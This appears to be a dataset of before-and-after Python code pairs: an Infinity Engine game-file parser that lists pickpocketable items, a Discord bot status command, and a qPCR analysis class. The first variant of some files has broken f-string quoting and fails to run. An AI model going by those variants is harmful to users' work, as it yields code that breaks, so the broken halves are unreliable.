if not (item['name'].startswith('dw#') and item['price'] == 0):
items[file[:-4].lower()] = item
len_f = len(cre_files)
tick = len_f // 40
print(f"Reading {len_f} CRE files.")
for c, file in enumerate(cre_files):
if not c % tick:
print(f"{game} CRE: {c}/{len_f}")
person = view_char(os.path.join(r, file), items, game, dlg_store)
if person['items'] or 'stores' in person:
if not person['name']:
person['name'] = file[:-4]
cre_dict[file.lower()[:-4]] = person
npc_list = set(cre_dict.keys())
len_f = len(are_files)
tick = len_f // 40
print(f"Reading {len_f} ARE files.")
for c, file in enumerate(are_files):
if not c % tick:
print(f"{game} ARE: {c}/{len_f}")
area, npcs = view_area(os.path.join(r, file), cre_dict)
if area:
npc_list -= npcs
area_key = file[:-4].lower()
are_dict[f"{area_key} - {area_lookup[area_key]}" if area_key in area_lookup else area_key] = area
len_f = len(baf_files)
tick = len_f // 40
print(f"Reading {len_f} BAF files.")
for c, file in enumerate(baf_files):
if not c % tick:
print(f"{game} ARE: {c}/{len_f}")
area, npcs = view_bcs(os.path.join(r, file), cre_dict)
if area:
npc_list -= npcs
area_key = file[:-4].lower()
are_dict[f"{area_key} (Spawned) - {area_lookup[area_key]}" if area_key in area_lookup else f"{area_key} (Spawned)"] = area
if npc_list:
are_dict['unknown'] = []
for npc in npc_list:
cre_dict[npc]['name'] += f" ({npc})"
are_dict['unknown']. append(cre_dict[npc])
# Store possible values that can appear in various columns to toggle those rows
areas = set()
item_types = {}
buf = ['data = [', '\t["Area", "NPC", "XP", "Gold Carried", "Pickpocket Skill", "Item Price (base)", "Item Type", "Item"],']
for are in sorted(are_dict):
for cre in sorted(are_dict[are], key=lambda i: i['name']):
for itm in sorted(cre['items'], key=lambda i: i['price'], reverse=True):
areas.add(are)
if itm["type"] not in item_types:
item_types[itm["type"]] = set()
item_types[itm["type"]].add(itm["name"])
buf.append(f'\t["{are}', '{cre['name']}", {cre['xp']}, {cre['gold']}, {itm['skill']}, {itm['price']}, "{itm['type']}", "{itm['name'] + ' (' + str(itm['quantity']) + ')' if 'quantity' in itm else itm['name']}", "{itm['type']}_{itm['name']}"],')
if 'stores' in cre:
for sto in sorted(cre['stores'], reverse=True):
areas.add(are)
for itm_id, itm_count in sorted(stores[sto]['items'], key=lambda i: i[0]):
# ignore items that don't have a proper identified name
if itm_id not in items:
continue
itm = items[itm_id]
if itm["type"] not in item_types:
item_types[itm["type"]] = set()
item_types[itm["type"]].add(itm["name"])
buf.append(f'\t["{are}', '{cre['name']} (Store)", {cre['xp']}, {cre['gold']}, {stores[sto]['skill']}, {itm['price']}, "{itm['type']}", "{itm['name']} ({itm_count})', '{itm['type']}_{itm['name']}"],')
buf.append(']\n')
with open(f'docs/{game}_table_data.py', 'w', encoding="utf-8") as f:
f.write('\n'.join(buf))
buf = [f'gamestr = "{game_str}"', 'headers = ["Area", "NPC", "XP", "Gold Carried", "Pickpocket Skill", "Item Price (base)", "Item Type", "Item"]\n', 'areas = [']
for a in sorted(areas):
buf.append(f'\t"{a}",')
buf.append(']\n')
buf.append('types = {')
for a in sorted(item_types):
buf.append(f'\t"{a}": [')
for b in sorted(item_types[a]):
buf.append(f'\t\t"{b}",')
buf.append('\t],')
buf.append('}\n')
with open(f'docs/{game}_config_data.py', 'w', encoding="utf-8") as f:
f.write('\n'.join(buf))
with open(f'docs/{game}.html', 'w', encoding="utf-8") as f:
f.write(index.format(game, game_str))
with open(f'docs/{game}_handle_page.py', 'w', encoding="utf-8") as f:
f.write(handle.format(game))
def main():
vals = [
('iwdee', 'Icewind Dale EE 2.6.6.0'),
('bgee', 'Baldur\'s Gate EE 2.6.6.0'),
('bg2ee', 'Baldur\'s Gate 2 EE 2.6.6.0'),
('custom_iwdee', 'Icewind Dale EE 2.6.5.0 + BetterHOF + CDTWEAKS'),
('custom_bgeet', 'Baldur\'s Gate EET 2.6.5.0 + SCS'),
]
for game, game_str in vals:
walk_game(game, game_str)
with open('docs\\index.html', 'w') as f:
f.write(root_index.format('</p><p>'.join([f'<a href="{x[0]}.html" target="_blank">{x[1]}</a>' for x in vals])))
if __name__ == '__main__':
main()
| ###
# Pickpocket list: area > person > item
# Add XP, Gold, Rep
###
import struct
import os
from manual.area_names import gen_area_names
from template_index import index
from handle_page import handle
from root_index import root_index
# wrapper function to convert byte string to regular string
def mystr(a_str):
return str(a_str, 'UTF-8').strip('\x00').replace('"', '\\"')
# Given an index, return a strings
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/tlk_v1.htm
def getname(idx, game):
if idx == -1:
return ""
assert idx >= 0, f"Invalid Name/String index: {idx}"
with open(f'{game}_files\\dialog.tlk', 'rb') as file:
text = file.read()
max_str = struct.unpack('i', text[0xa:0xa+4])[0]
if idx >= max_str:
return ""
abs_str_off = struct.unpack('i', text[0xe:0xe+4])[0]
data_off = 0x1a * idx + 0x12
str_off = struct.unpack('i', text[data_off+0x12:data_off+0x12+4])[0]
str_len = struct.unpack('i', text[data_off+0x16:data_off+0x16+4])[0]
return mystr(text[abs_str_off+str_off:abs_str_off+str_off+str_len])
# Return an array with difficulties for pickpocketing various equipment slots
def load_pickpocketting(game):
# https://baldursgate.fandom.com/wiki/Thief#Pick_Pockets
key_order = ['helmet', 'armour', 'shield', 'gauntlets', 'ring_left', 'ring_right', 'amulet', 'belt', 'boots',
'weapon1', 'weapon2', 'weapon3', 'weapon4', 'ammo1', 'ammo2', 'ammo3', 'ammo4', 'cloak', 'misc1', 'misc2', 'misc3',
'inv1', 'inv2', 'inv3', 'inv4', 'inv5', 'inv6', 'inv7', 'inv8', 'inv9', 'inv10', 'inv11', 'inv12', 'inv13', 'inv14', 'inv15', 'inv16']
vals = {}
with open(f'{game}_files\\sltsteal.2da', 'r') as file:
# skip headers
for i in range(3):
file.readline()
for line in file:
l_list = line.lower().strip().split()
vals[l_list[0]] = int(l_list[1])
return [vals[x] for x in key_order]
# Given a character name, return useful information
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/cre_v1.htm
def view_char(cre_file, item_list, game, dlg_store):
with open(cre_file, 'rb') as file:
try:
text = file.read()
finally:
file.close()
# Check That this is a CRE file
assert (mystr(text[0x0:0x0+4]) == 'CRE '), f"Invalid File Type: '{mystr(text[0x0:0x0+4])}'"
version = mystr(text[0x4:0x4+4]).lower()
ret = {}
# Check version since eah one stores files differently
if version == 'v1.0':
name = 0x8
race = 0x272
status = 0x20
xp = 0x14
gold = 0x1c
item_count_off = 0x2c0
item_offset_off = 0x2bc
pick_off = 0x6a
equip_off = 0x2b8
enemy = 0x270
dlg = 0x2cc
else:
assert False, f"Invalid File Version: '{version}'"
ret['items'] = []
# get list of items, check item slots, assign difficulty
item_count = struct.unpack('i', text[item_count_off:item_count_off+4])[0]
f_race = struct.unpack('B', text[race:race+1])[0]
f_status = struct.unpack('I', text[status:status + 4])[0]
ret['name'] = getname(struct.unpack('i', text[name:name + 4])[0], game)
ret['xp'] = struct.unpack('i', text[xp:xp + 4])[0]
ret['gold'] = struct.unpack('i', text[gold:gold + 4])[0]
dlg_file = mystr(text[dlg:dlg + 8]).lower()
if dlg_file in dlg_store:
ret['stores'] = dlg_store[dlg_file]
if item_count and f_race != 146 and not bool(f_status & 0b111111000000): # We can't pickpocket dragons or dead things
if struct.unpack('B', text[enemy:enemy+1])[0] == 0xff: # Enemies are hostile and cannot be pickpocketed, to my knowledge
return ret
item_offset = struct.unpack('i', text[item_offset_off:item_offset_off+4])[0]
items = []
for idx in range(item_count):
t_off = idx * 0x14 + item_offset
items.append((mystr(text[t_off:t_off + 8]).lower(), bool(struct.unpack('i', text[t_off + 0x10:t_off + 0x10 + 4])[0] & 0b1010), struct.unpack('h', text[t_off + 0xa:t_off + 0xa + 2])[0]))
pickpocket = struct.unpack('b', text[pick_off:pick_off + 1])[0]
equip_offset = struct.unpack('i', text[equip_off:equip_off + 4])[0]
pick_difficulty = load_pickpocketting(game)
equipped = struct.unpack('h', text[38 * 2 + equip_offset:38 * 2 + equip_offset + 2])[0]
if 0 <= equipped < 4:
pick_difficulty[9 + equipped] = 0
for idx, slot in enumerate(pick_difficulty):
if slot:
s_off = idx * 2 + equip_offset
item_idx = struct.unpack('h', text[s_off:s_off + 2])[0]
if item_count > item_idx >= 0:
item_itm = f"{items[item_idx][0]}"
if item_itm in item_list and item_list[item_itm]['drop'] and not items[item_idx][1]:
ret['items'].append({'type': item_list[item_itm]['type'], 'name': item_list[item_itm]['name'], 'price': item_list[item_itm]['price'], 'skill': pickpocket + pick_difficulty[idx]})
if items[item_idx][2] > 1 and item_list[item_itm]['type'] in ['Books & misc', 'Arrows', 'Potion', 'Scroll', 'Bullets', 'Darts', 'Bolts', 'Gold pieces', 'Gem', 'Wand', 'Containers/eye/broken armor', 'Books/Broken shields/bracelets', 'Familiars/Broken swords/earrings', 'Fur/pelt']:
ret['items'][-1]['quantity'] = items[item_idx][2]
return ret
# Given an item name, return useful information
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/itm_v1.htm
# TODO: Wand charge max (from first ability)
def view_item(itm_file, game):
with open(itm_file, 'rb') as file:
try:
text = file.read()
finally:
file.close()
# Check That this is a CRE file
assert (mystr(text[0x0:0x0+4]) == 'ITM '), f"Invalid File Type: '{mystr(text[0x0:0x0+4])}'"
version = mystr(text[0x4:0x4+4]).lower()
ret = {}
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/itm_v1.htm#Header_ItemType
item_type = ['Books & misc', 'Amulet', 'Armor', 'Belt & Girdle', 'Boots', 'Arrows', 'Bracers & gauntlets', 'Headgear', 'Key', 'Potion', 'Ring', 'Scroll', 'Shield', 'Food', 'Bullets', 'Bow', 'Dagger',
'Mace & Club', 'Sling', 'Small sword', 'Large sword', 'Hammer', 'Morning star', 'Flail', 'Darts', 'Axe', 'Quarterstaff', 'Crossbow', 'Hand-to-hand weapon', 'Spear', 'Halberd', 'Bolts',
'Cloaks & Robes', 'Gold pieces', 'Gem', 'Wand', 'Containers/eye/broken armor', 'Books/Broken shields/bracelets', 'Familiars/Broken swords/earrings', 'Tattoos', 'Lenses', 'Bucklers/teeth',
'Candles', 'Unknown', 'Clubs (IWD)', 'Unknown', 'Unknown', 'Large Shields (IWD)', 'Unknown', 'Medium Shields (IWD)', 'Notes', 'Unknown', 'Unknown', 'Small Shields (IWD)', 'Unknown',
'Telescopes (IWD)', 'Drinks (IWD)', 'Great Swords (IWD)', 'Container', 'Fur/pelt', 'Leather Armor', 'Studded Leather Armor', 'Chain Mail', 'Splint Mail', 'Half Plate', 'Full Plate',
'Hide Armor', 'Robe', 'Unknown', 'Bastard Sword', 'Scarf', 'Food (IWD2)', 'Hat', 'Gauntlet', 'Eyeballs', 'Earrings', 'Teeth', 'Bracelets']
# Check version since eah one stores files differently
if version == 'v1 ':
name = 0xc
price = 0x34
flags = 0x18
itm_type = 0x1c
max_count = 0
else:
assert False, f"Invalid File Version: '{version}'"
ret['name'] = getname(struct.unpack('i', text[name:name + 4])[0], game)
ret['price'] = struct.unpack('i', text[price:price + 4])[0]
ret['drop'] = bool(struct.unpack('i', text[flags:flags + 4])[0] & 4)
ret['type'] = item_type[struct.unpack('h', text[itm_type:itm_type + 2])[0]]
return ret
# Given an area name return a list of actors
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/are_v1.htm
def view_area(are_file, cre_dict):
with open(are_file, 'rb') as file:
try:
text = file.read()
finally:
file.close()
# Check That this is a CRE file
assert (mystr(text[0x0:0x0+4]) == 'AREA'), f"Invalid File Type: '{mystr(text[0x0:0x0+4])}'"
version = mystr(text[0x4:0x4+4]).lower()
ret = []
# Check version since eah one stores files differently
if version == 'v1.0':
actors_off = 0x54
actors_count = 0x58
else:
assert False, f"Invalid File Version: '{version}'"
t_actors = set() # Only include 1 instance of a character from each zone
for idx in range(struct.unpack('h', text[actors_count:actors_count + 2])[0]):
actor = struct.unpack('i', text[actors_off:actors_off + 4])[0] + idx * 0x110
actor_file = mystr(text[actor + 0x80:actor + 0x80 + 8]).lower()
if actor_file in cre_dict:
t_actors.add(actor_file)
for t_act in t_actors:
ret.append(cre_dict[t_act])
return ret, t_actors
# Given a store, return a list of items that can be stolen and how difficult they are
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/sto_v1.htm
def view_store(sto_file):
ret = {'items': [], 'difficult': 0}
with open(sto_file, 'rb') as file:
try:
text = file.read()
finally:
file.close()
# Check That this is a CRE file
assert (mystr(text[0x0:0x0+4]) == 'STOR'), f"Invalid File Type: '{mystr(text[0x0:0x0+4])}'"
version = mystr(text[0x4:0x4+4]).lower()
# Check version since eah one stores files differently
if version == 'v1.0':
steal = 0x10
diff = 0x20
item_offset = 0x34
item_count = 0x38
# in item
amount = 0x14
infinite = 0x18
stealable = 0x10
else:
assert False, f"Invalid File Version: '{version}'"
if struct.unpack('i', text[steal:steal + 4])[0] & 0b1000: # if you can steal
ret['skill'] = struct.unpack('H', text[diff:diff + 2])[0]
item_offset = struct.unpack('i', text[item_offset:item_offset + 4])[0]
for idx in range(struct.unpack('i', text[item_count:item_count + 4])[0]):
t_off = idx * 0x1c + item_offset
if not bool(struct.unpack('i', text[t_off + stealable:t_off + stealable + 4])[0] & 0b1010):
ret['items'].append((mystr(text[t_off:t_off + 8]).lower(), "Inf" if struct.unpack('i', text[t_off + infinite:t_off + infinite + 4])[0] else struct.unpack('i', text[t_off + amount:t_off + amount + 4])[0]))
return ret
# Given a dialog file, determine if it spawns a store you can steal from
# https://gibberlings3.github.io/iesdp/file_formats/ie_formats/dlg_v1.htm
def view_dlg(dlg_file, stores):
ret = []
with open(dlg_file, 'rb') as file:
try:
text = file.read()
finally:
file.close()
# Check That this is a CRE file
assert (mystr(text[0x0:0x0+4]) == 'DLG '), f"Invalid File Type: '{mystr(text[0x0:0x0+4])}'"
version = mystr(text[0x4:0x4+4]).lower()
# Check version since eah one stores files differently
if version == 'v1.0':
action_offset = 0x28
action_count = 0x2c
else:
assert False, f"Invalid File Version: '{version}'"
item_offset = struct.unpack('i', text[action_offset:action_offset + 4])[0]
for idx in range(struct.unpack('i', text[action_count:action_count + 4])[0]):
t_off = idx * 0x8 + item_offset
str_off = struct.unpack('i', text[t_off:t_off + 4])[0]
the_str = mystr(text[str_off:str_off + struct.unpack('i', text[t_off + 0x4:t_off + 0x4 + 4])[0]])
if the_str.startswith('StartStore'):
t_str = the_str.split('\\"')[1].lower()
if t_str in stores and t_str not in ret:
ret.append(t_str)
return ret
# Given a decompiled script file, extract all spawned creatures
def view_bcs(baf_file, cre_dict):
with open(baf_file, 'r', errors='ignore') as f:
t_actors = set() # Only include 1 instance of a character from each zone
ret = []
for line in f:
if 'CreateCreature' in line:
cre = line.split('"')[1].lower()
if cre in cre_dict:
t_actors.add(cre)
for t_act in t_actors:
ret.append(cre_dict[t_act])
return ret, t_actors
# NOTES: sell value is 1/2 of an items value. Items with charges are value/max_count*current_count
def walk_game(game, game_str):
area_lookup = gen_area_names(game)
# Areas -> actors -> items, so generate in reverse
# Create a dictionary with all valid items that can drop
items = {}
# Keep track of what can be stolen from stores
stores = {}
dlg_store = {}
# Create a list of all valid creatures that have valid items to pickpocket
cre_dict = {}
# Go through all areas and check all creatures for ones that can be pickpocketed
are_dict = {}
for r, d, f in os.walk(f"{game}_files"):
itm_files = []
cre_files = []
are_files = []
baf_files = []
sto_files = []
dlg_files = []
for f_temp in f:
f_temp = f_temp.lower()
if f_temp.endswith('.itm'):
itm_files.append(f_temp)
elif f_temp.endswith('.cre'):
cre_files.append(f_temp)
elif f_temp.endswith('.are'):
are_files.append(f_temp)
elif f_temp.endswith('.baf'):
baf_files.append(f_temp)
elif f_temp.endswith('.sto'):
sto_files.append(f_temp)
elif f_temp.endswith('.dlg'):
dlg_files.append(f_temp)
else:
print(f"Unexpected file: '{f_temp}'")
len_f = len(sto_files)
tick = len_f // 40
print(f"Reading {len_f} STO files.")
for c, file in enumerate(sto_files):
if not c % tick:
print(f"{game} STO: {c}/{len_f}")
item = view_store(os.path.join(r, file))
if item['items']:
stores[file[:-4].lower()] = item
len_f = len(dlg_files)
tick = len_f // 40
print(f"Reading {len_f} DLG files.")
for c, file in enumerate(dlg_files):
if not c % tick:
print(f"{game} DLG: {c}/{len_f}")
item = view_dlg(os.path.join(r, file), stores)
if item:
dlg_store[file[:-4].lower()] = item
len_f = len(itm_files)
tick = len_f // 40
print(f"Reading {len_f} ITM files.")
for c, file in enumerate(itm_files):
if not c % tick:
print(f"{game} ITM: {c}/{len_f}")
item = view_item(os.path.join(r, file), game)
# note items with no name
if not item['name']:
item['name'] = f"{file}{'' if file.startswith('rnd') else ' (TLK missing name)'}"
# remove EET items that appear to be script/difficulty related, ignore items with no proper name
if not (item['name'].startswith('dw#') and item['price'] == 0):
items[file[:-4].lower()] = item
len_f = len(cre_files)
tick = len_f // 40
print(f"Reading {len_f} CRE files.")
for c, file in enumerate(cre_files):
if not c % tick:
print(f"{game} CRE: {c}/{len_f}")
person = view_char(os.path.join(r, file), items, game, dlg_store)
if person['items'] or 'stores' in person:
if not person['name']:
person['name'] = file[:-4]
cre_dict[file.lower()[:-4]] = person
npc_list = set(cre_dict.keys())
len_f = len(are_files)
tick = len_f // 40
print(f"Reading {len_f} ARE files.")
for c, file in enumerate(are_files):
if not c % tick:
print(f"{game} ARE: {c}/{len_f}")
area, npcs = view_area(os.path.join(r, file), cre_dict)
if area:
npc_list -= npcs
area_key = file[:-4].lower()
are_dict[f"{area_key} - {area_lookup[area_key]}" if area_key in area_lookup else area_key] = area
len_f = len(baf_files)
tick = len_f // 40
print(f"Reading {len_f} BAF files.")
for c, file in enumerate(baf_files):
if not c % tick:
print(f"{game} ARE: {c}/{len_f}")
area, npcs = view_bcs(os.path.join(r, file), cre_dict)
if area:
npc_list -= npcs
area_key = file[:-4].lower()
are_dict[f"{area_key} (Spawned) - {area_lookup[area_key]}" if area_key in area_lookup else f"{area_key} (Spawned)"] = area
if npc_list:
are_dict['unknown'] = []
for npc in npc_list:
cre_dict[npc]['name'] += f" ({npc})"
are_dict['unknown']. append(cre_dict[npc])
# Store possible values that can appear in various columns to toggle those rows
areas = set()
item_types = {}
buf = ['data = [', '\t["Area", "NPC", "XP", "Gold Carried", "Pickpocket Skill", "Item Price (base)", "Item Type", "Item"],']
for are in sorted(are_dict):
for cre in sorted(are_dict[are], key=lambda i: i['name']):
for itm in sorted(cre['items'], key=lambda i: i['price'], reverse=True):
areas.add(are)
if itm["type"] not in item_types:
item_types[itm["type"]] = set()
item_types[itm["type"]].add(itm["name"])
buf.append(f'\t["{are}", "{cre["name"]}", {cre["xp"]}, {cre["gold"]}, {itm["skill"]}, {itm["price"]}, "{itm["type"]}", "{itm["name"] + " (" + str(itm["quantity"]) + ")" if "quantity" in itm else itm["name"]}", "{itm["type"]}_{itm["name"]}"],')
if 'stores' in cre:
for sto in sorted(cre['stores'], reverse=True):
areas.add(are)
for itm_id, itm_count in sorted(stores[sto]['items'], key=lambda i: i[0]):
# ignore items that don't have a proper identified name
if itm_id not in items:
continue
itm = items[itm_id]
if itm["type"] not in item_types:
item_types[itm["type"]] = set()
item_types[itm["type"]].add(itm["name"])
buf.append(f'\t["{are}", "{cre["name"]} (Store)", {cre["xp"]}, {cre["gold"]}, {stores[sto]["skill"]}, {itm["price"]}, "{itm["type"]}", "{itm["name"]} ({itm_count})", "{itm["type"]}_{itm["name"]}"],')
buf.append(']\n')
with open(f'docs/{game}_table_data.py', 'w', encoding="utf-8") as f:
f.write('\n'.join(buf))
buf = [f'gamestr = "{game_str}"', 'headers = ["Area", "NPC", "XP", "Gold Carried", "Pickpocket Skill", "Item Price (base)", "Item Type", "Item"]\n', 'areas = [']
for a in sorted(areas):
buf.append(f'\t"{a}",')
buf.append(']\n')
buf.append('types = {')
for a in sorted(item_types):
buf.append(f'\t"{a}": [')
for b in sorted(item_types[a]):
buf.append(f'\t\t"{b}",')
buf.append('\t],')
buf.append('}\n')
with open(f'docs/{game}_config_data.py', 'w', encoding="utf-8") as f:
f.write('\n'.join(buf))
with open(f'docs/{game}.html', 'w', encoding="utf-8") as f:
f.write(index.format(game, game_str))
with open(f'docs/{game}_handle_page.py', 'w', encoding="utf-8") as f:
f.write(handle.format(game))
def main():
vals = [
('iwdee', 'Icewind Dale EE 2.6.6.0'),
('bgee', 'Baldur\'s Gate EE 2.6.6.0'),
('bg2ee', 'Baldur\'s Gate 2 EE 2.6.6.0'),
('custom_iwdee', 'Icewind Dale EE 2.6.5.0 + BetterHOF + CDTWEAKS'),
('custom_bgeet', 'Baldur\'s Gate EET 2.6.5.0 + SCS'),
]
for game, game_str in vals:
walk_game(game, game_str)
with open('docs\\index.html', 'w') as f:
f.write(root_index.format('</p><p>'.join([f'<a href="{x[0]}.html" target="_blank">{x[1]}</a>' for x in vals])))
if __name__ == '__main__':
main()
|
import time
from discord.ext import commands
import os
import psutil
import platform
uname = platform.uname()
class Status(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command(name="status", aliases=["stats", "dash", "dashboard", "übersicht", "performance", "stat"])
async def mc_command(self, ctx):
pid = os.getpid()
process = psutil.Process(pid)
process.create_time()
memoryuse = process.memory_full_info()
await ctx.send(f"```prolog\n"
f"Discord Stuff:\n"
f"Servers: {len(self.client.guilds)}\n"
f"Users: {len(set(self.client.get_all_members()))}\n"
"-------\n"
f"Bot Technical:\n"
f"RAM-Usage: {memoryuse.rss / 1024000} MB \n"
f'Running Since: {time.strftime('%d.%m.%Y %H:%M', time.localtime(process.create_time()))}\n'
f"Websocket Latency: {round(self.client.latency * 1000)}ms\n"
f"Shard Count: {len(list(self.client.shards))}\n"
"-------\n"
f"System:\n"
f"CPU-Usage: {psutil.cpu_percent()}%\n"
f"RAM-Usage : {psutil.virtual_memory()[2]}%\n"
f"OS: {uname.system} {uname.version}\n"
f"Systemarchitecture: {uname.machine}\n"
f"```")
def setup(client):
client.add_cog(Status(client))
| import time
from discord.ext import commands
import os
import psutil
import platform
uname = platform.uname()
class Status(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command(name="status", aliases=["stats", "dash", "dashboard", "übersicht", "performance", "stat"])
async def mc_command(self, ctx):
pid = os.getpid()
process = psutil.Process(pid)
process.create_time()
memoryuse = process.memory_full_info()
await ctx.send(f"```prolog\n"
f"Discord Stuff:\n"
f"Servers: {len(self.client.guilds)}\n"
f"Users: {len(set(self.client.get_all_members()))}\n"
"-------\n"
f"Bot Technical:\n"
f"RAM-Usage: {memoryuse.rss / 1024000} MB \n"
f'Running Since: {time.strftime("%d.%m.%Y %H:%M", time.localtime(process.create_time()))}\n'
f"Websocket Latency: {round(self.client.latency * 1000)}ms\n"
f"Shard Count: {len(list(self.client.shards))}\n"
"-------\n"
f"System:\n"
f"CPU-Usage: {psutil.cpu_percent()}%\n"
f"RAM-Usage : {psutil.virtual_memory()[2]}%\n"
f"OS: {uname.system} {uname.version}\n"
f"Systemarchitecture: {uname.machine}\n"
f"```")
def setup(client):
client.add_cog(Status(client))
|
import re
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import pyperclip
import seaborn as sns
class QPCRAnalysis:
def __init__(self,
data,
genes,
samples,
ntc_cols=True,
columns_per_sample=2):
'''
data: can be a filename to a tsv as exported by the lightcycler or a dataframe
'''
self.samples = samples
self.genes = genes
if isinstance(data, pd.DataFrame):
df = data
else:
with open(data, 'r') as f:
self.experiment_name = re.match('Experiment: ([^ ]*)',
f.readline()).groups()[0]
df = pd.read_csv(data, sep='\t', skiprows=1)
df.drop('Name', inplace=True, axis=1)
df['ypos'] = df['Pos'].apply(lambda pos: ord(pos[0]) - ord('A'))
df['ypos'] -= df['ypos'].min()
ntc_row = df['ypos'].max()
df['xpos'] = df['Pos'].apply(lambda pos: int(pos[1:]))
# only consider non-NTCs here
df['xpos'] -= df.loc[df['ypos'] < ntc_row, 'xpos'].min()
if ntc_cols:
if ntc_cols is True:
ntc_cols = list(range(0, len(genes) * 2, 2))
self.ntcs = pd.Series(
df.loc[df['xpos'].isin(ntc_cols) & (df['ypos'] == ntc_row),
'Cp'].tolist(),
index=genes)
else:
self.ntcs = None
df = df[(df.ypos < ntc_row)
& (df.xpos < len(samples) * columns_per_sample)]
df['gene'] = self._assign_genes(df, genes, columns_per_sample)
df['sample'] = pd.Categorical(
df.xpos.apply(lambda xpos: samples[xpos // columns_per_sample]),
categories=samples,
ordered=True)
self.df = df[['sample', 'gene', 'Cp', 'xpos', 'ypos']]
def dropna(self):
na_index = self.df.index[self.df.Cp.isna()]
print(f'Deleting {len(na_index)} Nans')
self.df.drop(na_index, inplace=True)
def _assign_genes(self, df, genes, columns_per_sample):
def _gene(row):
index = ((row['ypos'] // 3) * columns_per_sample +
(row['xpos'] % columns_per_sample))
try:
return genes[index]
except IndexError:
print(index)
raise
return df.apply(_gene, axis=1)
def outliers(self):
df = self.df.copy()
triplet_deviations = df.groupby(['sample', 'gene'])['Cp'].std()
df['index'] = df.index
outlier_triplets = df.set_index(
['sample',
'gene']).loc[triplet_deviations.index[triplet_deviations > 0.5]]
outlier_ids = []
for name, group in outlier_triplets.groupby(level=['sample', 'gene']):
diffs = (group.Cp - group.Cp.mean())
if len(diffs) == 3:
sorted_diffs = diffs.abs().reset_index(drop=True).sort_values(ascending=False)
if sorted_diffs.iloc[0] > 1.5 * sorted_diffs.iloc[1]:
index = group.iloc[sorted_diffs.index[0]]['index']
outlier_ids.append(int(index))
# print(diffs.iloc[lid], df[df['index'] == index])
# elif len(diffs) == 2: # does this make sense? if we have two, then leave the two!
# # delete the larger one
# index = group.iloc[group.Cp.reset_index(
# drop=True).argmax()]['index']
return outlier_ids
def plot_outliers(self): # TODO
triplet_deviations = self.df.groupby(['sample', 'gene']).std()['Cp']
outlier_triplets = self.df.set_index(['sample', 'gene']).loc[
triplet_deviations.index[triplet_deviations > 0.5]].reset_index()
outlier_triplets['triplet_name'] = outlier_triplets['sample'].str.cat(
outlier_triplets.gene, sep='_')
sns.swarmplot(data=outlier_triplets.reset_index(),
x='triplet_name',
y='Cp')
plt.xticks(rotation=90)
def plot_cps(self, exclude_genes=[]):
plt.subplots(figsize=(10, 7))
# g = sns.barplot(y='Cp', hue='sample', x='gene', data=self.df.sort_values('sample'), dodge=True)
plot_df = self.df.sort_values('sample')
plot_df = plot_df[~plot_df.gene.isin(exclude_genes)]
g = sns.barplot(y='Cp',
hue='sample',
x='gene',
data=plot_df,
dodge=True)
plt.xticks(rotation=30)
plt.title('Raw Cp values')
plt.legend(ncol=3, loc='upper center', bbox_to_anchor=[0.5, -0.15])
def normalized_df(self, normalizers, exclude_genes=[], exclude_samples=[], include_samples=None, include_genes=None, norm_to_one=None):
'''
:include_samples: takes precedence over exclude_samples. Can be used to determ̀ine the plotting order
:include_genes: takes precedence over exclude_genes. Can be used to determ̀ine the plotting order
'''
assert len(normalizers) > 0, 'At least one normalizer is required'
means = self.df.groupby(['sample', 'gene']).mean().unstack()['Cp']
stds = self.df.groupby(['sample', 'gene']).std().unstack()['Cp']
summed_normalizers = None
for normalizer in normalizers:
if summed_normalizers is None:
summed_normalizers = means[normalizer]
else:
summed_normalizers = summed_normalizers + means[normalizer]
summed_normalizers = summed_normalizers / len(normalizers)
delta = means.subtract(
summed_normalizers, axis=0
) # normalization like this results in geometric mean normalization on mRNA expression level
non_normalization_genes = [
gene for gene in self.genes if gene not in normalizers
]
if include_genes:
plot_genes = [
gene for gene in include_genes
if gene in non_normalization_genes
]
else:
plot_genes = [
gene for gene in non_normalization_genes
if gene not in exclude_genes
]
delta_low = delta - stds
delta_high = delta + stds
q = np.power(2, -delta)
q_low = np.power(2, -delta_low)
q_high = np.power(2, -delta_high)
q_std = pd.concat(dict(q=q, q_low=q_low, q_high=q_high),
axis=1).std(axis=1, level=1)
# fig, ax = plt.subplots(figsize=(10, 5))
plot_df = q[plot_genes].stack().reset_index().rename(
columns={0: 'expression'})
plot_df['error'] = q_std[plot_genes].stack().reset_index()[0]
if include_samples is not None:
plot_df = plot_df[plot_df['sample'].isin(include_samples)]
plot_df['sample'] = pd.Categorical(plot_df['sample'],
categories=include_samples,
ordered=True)
plot_df.sort_values('sample', inplace=True)
else:
plot_df = plot_df[~plot_df['sample'].isin(exclude_samples)]
if include_genes:
plot_df['gene'] = pd.Categorical(plot_df['gene'],
categories=plot_genes,
ordered=True)
plot_df.sort_values('gene', inplace=True, kind='mergesort') # mergesort is stable
if norm_to_one:
normed = plot_df.set_index(['sample', 'gene']).groupby('gene').apply(lambda group: pd.DataFrame({
'expression': group['expression'] / group.loc[norm_to_one, 'expression'],
'error': group['error'] / group.loc[norm_to_one, 'expression']}))
return normed.reset_index()
else:
return plot_df
def plot_normalized(self,
normalizers,
exclude_genes=[],
exclude_samples=[],
include_samples=None,
include_genes=None,
colors=None,
legend=True,
norm_to_one=None,
**kwargs
):
'''
This has been built using the Ciaudo Lab Excel qPCR analysis sheet as template
'''
from moritzsphd.plot import grouped_barplot
plot_df = self.normalized_df(normalizers, exclude_genes, exclude_samples, include_samples, include_genes, norm_to_one)
fig = grouped_barplot(data=plot_df,
y='expression',
x='gene',
hue='sample',
yerr='error',
split_yaxis='gene',
colors=colors,
**kwargs
)
#sns.barplot(data=plot_df, y='expression', x='gene', hue='sample')
#plt.errorbar(x=plot_df['gene'], y=plot_df['expression'], fmt='none', yerror=plot_df['error'], ecolor='k', elinewidth=2)
plt.subplots_adjust(top=0.85)
plt.suptitle(
f'gene expression normalized by {'geometric mean of ' if len(normalizers) > 1 else ''}{' and '.join(normalizers)}'
)
sns.despine()
if legend:
plt.legend(ncol=3, loc='upper center', bbox_to_anchor=[0.5, -0.1])
return fig
def drop_outliers(self):
self.df.drop(self.outliers(), inplace=True)
def plot_heatmap(self):
fig, ax = plt.subplots(figsize=(15, 7))
